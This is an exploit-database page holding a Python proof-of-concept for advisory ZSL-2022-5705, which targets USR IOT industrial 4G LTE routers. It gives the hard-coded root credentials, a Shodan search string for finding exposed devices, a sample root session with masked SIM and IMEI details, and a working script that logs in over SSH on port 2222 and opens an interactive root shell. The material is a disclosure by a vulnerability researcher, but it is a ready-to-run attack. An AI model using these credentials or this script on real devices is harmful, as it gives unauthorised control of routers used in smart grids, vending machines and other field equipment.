Share
## https://sploitus.com/exploit?id=1337DAY-ID-37660
#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
#                   1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*"  // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# [emailΒ protected]:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd"  && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# [emailΒ protected]:~$ 
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
#            OpenWrt/Linaro GCC 4.8-2014.04
#            Ralink SoC MT7628 PCIe RC mode
#            BusyBox v1.22.1
#            uhttpd
#            Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#


import paramiko as bah
import sys as baaaaaah

bnr='''
        β–„β€’ β–„β–Œ.β–„β–„ Β· β–„β–„β–„  β–ͺ        β–„β–„β–„β–„β–„        
        β–ˆβ–ͺβ–ˆβ–ˆβ–Œβ–β–ˆ β–€. β–€β–„ β–ˆΒ·β–ˆβ–ˆ β–ͺ     β€’β–ˆβ–ˆ          
        β–ˆβ–Œβ–β–ˆβ–Œβ–„β–€β–€β–€β–ˆβ–„β–β–€β–€β–„ β–β–ˆΒ· β–„β–ˆβ–€β–„  β–β–ˆ.β–ͺ        
        β–β–ˆβ–„β–ˆβ–Œβ–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆβ€’β–ˆβ–Œβ–β–ˆβ–Œβ–β–ˆβ–Œ.β–β–Œ β–β–ˆβ–ŒΒ·        
β–„β–„β–„β–„Β·  β–„β–„β–„Β·β–€ β–„β–„Β·β–€β–„ β€’β–„ Β·β–„β–„β–„β–„ β–€β–ˆβ–„β–€β–ͺ β–€β–€β–€    β–„β–„β–„  
β–β–ˆ β–€β–ˆβ–ͺβ–β–ˆ β–€β–ˆ β–β–ˆ β–Œβ–ͺβ–ˆβ–Œβ–„β–Œβ–ͺβ–ˆβ–ˆβ–ͺ β–ˆβ–ˆ β–ͺ     β–ͺ     β–€β–„ β–ˆΒ·
β–β–ˆβ–€β–€β–ˆβ–„β–„β–ˆβ–€β–€β–ˆ β–ˆβ–ˆ β–„β–„β–β–€β–€β–„Β·β–β–ˆΒ· β–β–ˆβ–Œ β–„β–ˆβ–€β–„  β–„β–ˆβ–€β–„ ▐▀▀▄ 
β–ˆβ–ˆβ–„β–ͺβ–β–ˆβ–β–ˆ β–ͺβ–β–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆ.β–ˆβ–Œβ–ˆβ–ˆ. β–ˆβ–ˆ β–β–ˆβ–Œ.β–β–Œβ–β–ˆβ–Œ.β–β–Œβ–β–ˆβ€’β–ˆβ–Œ
Β·β–€β–€β–€β–€  β–€  β–€ β–„β–„β–„β–€ Β·β–€  β–€β–€β–€β–€β–€β–€β€’ β–„β–„β–„β–„β–„β–ͺ β–€β–ˆβ–„β–€β–ͺ.β–€  β–€
            β–€β–„ β–ˆΒ·β–ͺ     β–ͺ     β€’β–ˆβ–ˆ              
            ▐▀▀▄  β–„β–ˆβ–€β–„  β–„β–ˆβ–€β–„  β–β–ˆ.β–ͺ            
            β–β–ˆβ€’β–ˆβ–Œβ–β–ˆβ–Œ.β–β–Œβ–β–ˆβ–Œ.β–β–Œ β–β–ˆβ–ŒΒ·            
         β–„β–„β–„Β·β–€ β–„β–„Β·β–€β–ˆβ–„β–„Β· β–„β–„β–„β–€..β–„β–„β–€Β· .β–„β–„ Β·      
        β–β–ˆ β–€β–ˆ β–β–ˆ β–Œβ–ͺβ–β–ˆ β–Œβ–ͺβ–€β–„.β–€Β·β–β–ˆ β–€. β–β–ˆ β–€.      
        β–„β–ˆβ–€β–€β–ˆ β–ˆβ–ˆ β–„β–„β–ˆβ–ˆ ▄▄▐▀▀β–ͺβ–„β–„β–€β–€β–€β–ˆβ–„β–„β–€β–€β–€β–ˆβ–„     
        β–β–ˆ β–ͺβ–β–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆβ–ˆβ–ˆβ–Œβ–β–ˆβ–„β–„β–Œβ–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆβ–„β–ͺβ–β–ˆ     
         β–€  β–€ Β·β–€β–€β–€ Β·β–€β–€β–€  β–€β–€β–€  β–€β–€β–€β–€  β–€β–€β–€β–€      
'''
print(bnr)

if len(baaaaaah.argv)<2:
    print('--Gief me an IP.')
    exit(0)

adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'

rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
    rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
    print('--Got rewt!')
except:
    print('--Backdoor removed.')
    exit(-1)

while True:
    cmnd=input('# ')
    if cmnd=='exit':
        rsh.exec_command('exit')
        break
    stdin,stdout,stderr = rsh.exec_command(cmnd)
    print(stdout.read().decode().strip())

rsh.close()